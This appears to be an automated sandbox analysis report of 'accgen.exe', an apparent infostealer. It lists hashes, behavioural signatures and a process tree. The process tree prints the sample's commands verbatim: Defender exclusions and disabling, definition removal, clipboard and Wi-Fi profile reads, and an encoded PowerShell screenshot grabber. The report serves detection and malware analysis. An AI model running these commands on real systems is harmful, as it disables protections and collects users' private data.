Resubmissions
11-12-2024 20:16
241211-y2jj2a1pbn 1007-12-2024 23:58
241207-31ftzawpbl 1006-12-2024 00:18
241206-al2hxazlh1 1005-12-2024 20:14
241205-yz2b3awpfq 1005-12-2024 18:42
241205-xcrnnswqgs 1005-12-2024 02:56
241205-dfenqs1mbl 1005-12-2024 02:56
241205-de5tja1maj 1005-12-2024 00:22
241205-an7gyavkal 1004-12-2024 22:51
241204-2s976s1mhj 10Analysis
-
max time kernel
11s -
max time network
15s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
11-12-2024 20:16
Behavioral task
behavioral1
Sample
accgen.exe
Resource
win10ltsc2021-20241211-en
General
-
Target
accgen.exe
-
Size
7.5MB
-
MD5
f1c9d53dc67cafd6d193be9a4b33f627
-
SHA1
dc1de348ba0cd40c6b10cb528e7aee83072c6aa0
-
SHA256
45715d3b3c58ea90088529b234c4ebb34a005c5d7406b4a92a3e116aa28c26c2
-
SHA512
aaba4de3b7e9bd1e8c41e655cbe29addcbe98f62f4b6ad599fe7a59e4616881ca97a91ae0a457df0421d586eb586a13f62aff10907a386f1cf3a25be7fa6244c
-
SSDEEP
196608:WlQCwVhurErvI9pWjgN3ZdahF0pbH1AY7WtQsNo/03vC1J:LVhurEUWjqeWx06rYYJ
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 820 MpCmdRun.exe -
pid Process 1096 powershell.exe 5088 powershell.exe 1140 powershell.exe 3680 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts accgen.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4392 cmd.exe 4840 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 476 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe 3368 accgen.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com 11 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 2584 tasklist.exe 1668 tasklist.exe 1892 tasklist.exe 3108 tasklist.exe 2824 tasklist.exe -
resource yara_rule behavioral1/files/0x0028000000046140-21.dat upx behavioral1/memory/3368-25-0x00007FFB74300000-0x00007FFB749C4000-memory.dmp upx behavioral1/files/0x0028000000046133-27.dat upx behavioral1/files/0x0028000000046139-46.dat upx behavioral1/files/0x002800000004613a-47.dat upx behavioral1/memory/3368-48-0x00007FFB8CD90000-0x00007FFB8CD9F000-memory.dmp upx behavioral1/files/0x0028000000046137-44.dat upx behavioral1/files/0x0028000000046134-41.dat upx behavioral1/files/0x0029000000046132-40.dat upx behavioral1/files/0x0028000000046145-39.dat upx behavioral1/files/0x0028000000046144-38.dat upx behavioral1/files/0x0028000000046143-37.dat upx behavioral1/files/0x002800000004613f-34.dat upx behavioral1/files/0x002800000004613d-33.dat upx behavioral1/files/0x002800000004613e-31.dat upx behavioral1/files/0x0028000000046138-45.dat upx behavioral1/files/0x0028000000046136-43.dat upx behavioral1/files/0x0028000000046135-42.dat upx behavioral1/memory/3368-30-0x00007FFB87CF0000-0x00007FFB87D15000-memory.dmp upx behavioral1/memory/3368-54-0x00007FFB87CC0000-0x00007FFB87CED000-memory.dmp upx behavioral1/memory/3368-56-0x00007FFB8A060000-0x00007FFB8A07A000-memory.dmp upx behavioral1/memory/3368-58-0x00007FFB87C90000-0x00007FFB87CB4000-memory.dmp upx behavioral1/memory/3368-60-0x00007FFB831A0000-0x00007FFB8331F000-memory.dmp upx behavioral1/memory/3368-62-0x00007FFB87610000-0x00007FFB87629000-memory.dmp upx behavioral1/memory/3368-64-0x00007FFB87C80000-0x00007FFB87C8D000-memory.dmp upx behavioral1/memory/3368-66-0x00007FFB871C0000-0x00007FFB871F3000-memory.dmp upx behavioral1/memory/3368-68-0x00007FFB74300000-0x00007FFB749C4000-memory.dmp upx behavioral1/memory/3368-73-0x00007FFB87CF0000-0x00007FFB87D15000-memory.dmp upx behavioral1/memory/3368-74-0x00007FFB73DD0000-0x00007FFB742F9000-memory.dmp upx behavioral1/memory/3368-71-0x00007FFB83A30000-0x00007FFB83AFD000-memory.dmp upx behavioral1/memory/3368-76-0x00007FFB875F0000-0x00007FFB87604000-memory.dmp upx behavioral1/memory/3368-78-0x00007FFB87CC0000-0x00007FFB87CED000-memory.dmp upx behavioral1/memory/3368-79-0x00007FFB873B0000-0x00007FFB873BD000-memory.dmp upx behavioral1/memory/3368-81-0x00007FFB83080000-0x00007FFB8319B000-memory.dmp upx behavioral1/memory/3368-102-0x00007FFB87C90000-0x00007FFB87CB4000-memory.dmp upx behavioral1/memory/3368-187-0x00007FFB831A0000-0x00007FFB8331F000-memory.dmp upx behavioral1/memory/3368-234-0x00007FFB87610000-0x00007FFB87629000-memory.dmp upx behavioral1/memory/3368-292-0x00007FFB87C80000-0x00007FFB87C8D000-memory.dmp upx behavioral1/memory/3368-296-0x00007FFB83A30000-0x00007FFB83AFD000-memory.dmp upx behavioral1/memory/3368-295-0x00007FFB871C0000-0x00007FFB871F3000-memory.dmp upx behavioral1/memory/3368-315-0x00007FFB73DD0000-0x00007FFB742F9000-memory.dmp upx behavioral1/memory/3368-331-0x00007FFB831A0000-0x00007FFB8331F000-memory.dmp upx behavioral1/memory/3368-325-0x00007FFB74300000-0x00007FFB749C4000-memory.dmp upx behavioral1/memory/3368-339-0x00007FFB83080000-0x00007FFB8319B000-memory.dmp upx behavioral1/memory/3368-338-0x00007FFB873B0000-0x00007FFB873BD000-memory.dmp upx behavioral1/memory/3368-326-0x00007FFB87CF0000-0x00007FFB87D15000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4584 cmd.exe 4896 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1512 WMIC.exe 3456 WMIC.exe 3176 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5012 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 4208 WMIC.exe 4208 WMIC.exe 4208 WMIC.exe 4208 WMIC.exe 1096 powershell.exe 3680 powershell.exe 1096 powershell.exe 3680 powershell.exe 1512 WMIC.exe 1512 WMIC.exe 1512 WMIC.exe 1512 WMIC.exe 3456 WMIC.exe 3456 WMIC.exe 3456 WMIC.exe 3456 WMIC.exe 4436 WMIC.exe 4436 WMIC.exe 4436 WMIC.exe 4436 WMIC.exe 4840 powershell.exe 4840 powershell.exe 4840 powershell.exe 2096 powershell.exe 2096 powershell.exe 2096 powershell.exe 5088 powershell.exe 5088 powershell.exe 2392 powershell.exe 2392 powershell.exe 3608 WMIC.exe 3608 WMIC.exe 3608 WMIC.exe 3608 WMIC.exe 4088 WMIC.exe 4088 WMIC.exe 4088 WMIC.exe 4088 WMIC.exe 2220 WMIC.exe 2220 WMIC.exe 2220 WMIC.exe 2220 WMIC.exe 1140 powershell.exe 1140 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 4208 WMIC.exe Token: SeSecurityPrivilege 4208 WMIC.exe Token: SeTakeOwnershipPrivilege 4208 WMIC.exe Token: SeLoadDriverPrivilege 4208 WMIC.exe Token: SeSystemProfilePrivilege 4208 WMIC.exe Token: SeSystemtimePrivilege 4208 WMIC.exe Token: SeProfSingleProcessPrivilege 4208 WMIC.exe Token: SeIncBasePriorityPrivilege 4208 WMIC.exe Token: SeCreatePagefilePrivilege 4208 WMIC.exe Token: SeBackupPrivilege 4208 WMIC.exe Token: SeRestorePrivilege 4208 WMIC.exe Token: SeShutdownPrivilege 4208 WMIC.exe Token: SeDebugPrivilege 4208 WMIC.exe Token: SeSystemEnvironmentPrivilege 4208 WMIC.exe Token: SeRemoteShutdownPrivilege 4208 WMIC.exe Token: SeUndockPrivilege 4208 WMIC.exe Token: SeManageVolumePrivilege 4208 WMIC.exe Token: 33 4208 WMIC.exe Token: 34 4208 WMIC.exe Token: 35 4208 WMIC.exe Token: 36 4208 WMIC.exe Token: SeDebugPrivilege 2584 tasklist.exe Token: SeDebugPrivilege 1096 powershell.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeIncreaseQuotaPrivilege 4208 WMIC.exe Token: SeSecurityPrivilege 4208 WMIC.exe Token: SeTakeOwnershipPrivilege 4208 WMIC.exe Token: SeLoadDriverPrivilege 4208 WMIC.exe Token: SeSystemProfilePrivilege 4208 WMIC.exe Token: SeSystemtimePrivilege 4208 WMIC.exe Token: SeProfSingleProcessPrivilege 4208 WMIC.exe Token: SeIncBasePriorityPrivilege 4208 WMIC.exe Token: SeCreatePagefilePrivilege 4208 WMIC.exe Token: SeBackupPrivilege 4208 WMIC.exe Token: SeRestorePrivilege 4208 WMIC.exe Token: SeShutdownPrivilege 4208 WMIC.exe Token: SeDebugPrivilege 4208 WMIC.exe Token: SeSystemEnvironmentPrivilege 4208 WMIC.exe Token: SeRemoteShutdownPrivilege 4208 WMIC.exe Token: SeUndockPrivilege 4208 WMIC.exe Token: SeManageVolumePrivilege 4208 WMIC.exe Token: 33 4208 WMIC.exe Token: 34 4208 WMIC.exe Token: 35 4208 WMIC.exe Token: 36 4208 WMIC.exe Token: SeIncreaseQuotaPrivilege 3680 powershell.exe Token: SeSecurityPrivilege 3680 powershell.exe Token: SeTakeOwnershipPrivilege 3680 powershell.exe Token: SeLoadDriverPrivilege 3680 powershell.exe Token: SeSystemProfilePrivilege 3680 powershell.exe Token: SeSystemtimePrivilege 3680 powershell.exe Token: SeProfSingleProcessPrivilege 3680 powershell.exe Token: SeIncBasePriorityPrivilege 3680 powershell.exe Token: SeCreatePagefilePrivilege 3680 powershell.exe Token: SeBackupPrivilege 3680 powershell.exe Token: SeRestorePrivilege 3680 powershell.exe Token: SeShutdownPrivilege 3680 powershell.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeSystemEnvironmentPrivilege 3680 powershell.exe Token: SeRemoteShutdownPrivilege 3680 powershell.exe Token: SeUndockPrivilege 3680 powershell.exe Token: SeManageVolumePrivilege 3680 powershell.exe Token: 33 3680 powershell.exe Token: 34 3680 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3792 wrote to memory of 3368 3792 accgen.exe 79 PID 3792 wrote to memory of 3368 3792 accgen.exe 79 PID 3368 wrote to memory of 2304 3368 accgen.exe 80 PID 3368 wrote to memory of 2304 3368 accgen.exe 80 PID 3368 wrote to memory of 3236 3368 accgen.exe 81 PID 3368 wrote to memory of 3236 3368 accgen.exe 81 PID 3368 wrote to memory of 936 3368 accgen.exe 83 PID 3368 wrote to memory of 936 3368 accgen.exe 83 PID 3368 wrote to memory of 4212 3368 accgen.exe 86 PID 3368 wrote to memory of 4212 3368 accgen.exe 86 PID 936 wrote to memory of 2584 936 cmd.exe 88 PID 936 wrote to memory of 2584 936 cmd.exe 88 PID 3236 wrote to memory of 1096 3236 cmd.exe 89 PID 3236 wrote to memory of 1096 3236 cmd.exe 89 PID 4212 wrote to memory of 4208 4212 cmd.exe 90 PID 4212 wrote to memory of 4208 4212 cmd.exe 90 PID 2304 wrote to memory of 3680 2304 cmd.exe 91 PID 2304 wrote to memory of 3680 2304 cmd.exe 91 PID 3368 wrote to memory of 3584 3368 accgen.exe 94 PID 3368 wrote to memory of 3584 3368 accgen.exe 94 PID 3584 wrote to memory of 4620 3584 cmd.exe 137 PID 3584 wrote to memory of 4620 3584 cmd.exe 137 PID 3368 wrote to memory of 2696 3368 accgen.exe 97 PID 3368 wrote to memory of 2696 3368 accgen.exe 97 PID 2696 wrote to memory of 3340 2696 cmd.exe 164 PID 2696 wrote to memory of 3340 2696 cmd.exe 164 PID 3368 wrote to memory of 1956 3368 accgen.exe 139 PID 3368 wrote to memory of 1956 3368 accgen.exe 139 PID 1956 wrote to memory of 1512 1956 cmd.exe 102 PID 1956 wrote to memory of 1512 1956 cmd.exe 102 PID 3368 wrote to memory of 4360 3368 accgen.exe 146 PID 3368 wrote to memory of 4360 3368 accgen.exe 146 PID 4360 wrote to memory of 3456 4360 cmd.exe 145 PID 4360 wrote to memory of 3456 4360 cmd.exe 145 PID 3236 wrote to memory of 820 3236 cmd.exe 106 PID 3236 wrote to memory of 820 3236 cmd.exe 106 PID 3368 wrote to memory of 1188 3368 accgen.exe 107 PID 3368 wrote to memory of 1188 3368 accgen.exe 107 PID 3368 wrote to memory of 1560 3368 accgen.exe 109 PID 3368 wrote to memory of 1560 3368 accgen.exe 109 PID 1188 wrote to memory of 1668 1188 cmd.exe 111 PID 1188 wrote to memory of 1668 1188 cmd.exe 111 PID 1560 wrote to memory of 1892 1560 cmd.exe 112 PID 1560 wrote to memory of 1892 1560 cmd.exe 112 PID 3368 wrote to memory of 5064 3368 accgen.exe 113 PID 3368 wrote to memory of 5064 3368 accgen.exe 113 PID 3368 wrote to memory of 4392 3368 accgen.exe 115 PID 3368 wrote to memory of 4392 3368 accgen.exe 115 PID 3368 wrote to memory of 3832 3368 accgen.exe 117 PID 3368 wrote to memory of 3832 3368 accgen.exe 117 PID 3368 wrote to memory of 1700 3368 accgen.exe 119 PID 3368 wrote to memory of 1700 3368 accgen.exe 119 PID 5064 wrote to memory of 4436 5064 cmd.exe 121 PID 5064 wrote to memory of 4436 5064 cmd.exe 121 PID 3368 wrote to memory of 4584 3368 accgen.exe 122 PID 3368 wrote to memory of 4584 3368 accgen.exe 122 PID 3368 wrote to memory of 2576 3368 accgen.exe 123 PID 3368 wrote to memory of 2576 3368 accgen.exe 123 PID 3368 wrote to memory of 2004 3368 accgen.exe 125 PID 3368 wrote to memory of 2004 3368 accgen.exe 125 PID 3368 wrote to memory of 348 3368 accgen.exe 127 PID 3368 wrote to memory of 348 3368 accgen.exe 127 PID 4392 wrote to memory of 4840 4392 cmd.exe 130 PID 4392 wrote to memory of 4840 4392 cmd.exe 130 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1288 attrib.exe 3732 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\accgen.exe"C:\Users\Admin\AppData\Local\Temp\accgen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Users\Admin\AppData\Local\Temp\accgen.exe"C:\Users\Admin\AppData\Local\Temp\accgen.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\accgen.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\accgen.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:3340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:1512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:3456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3832
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1700
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4584 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2576
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:5012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:2004
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:1664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:348
-
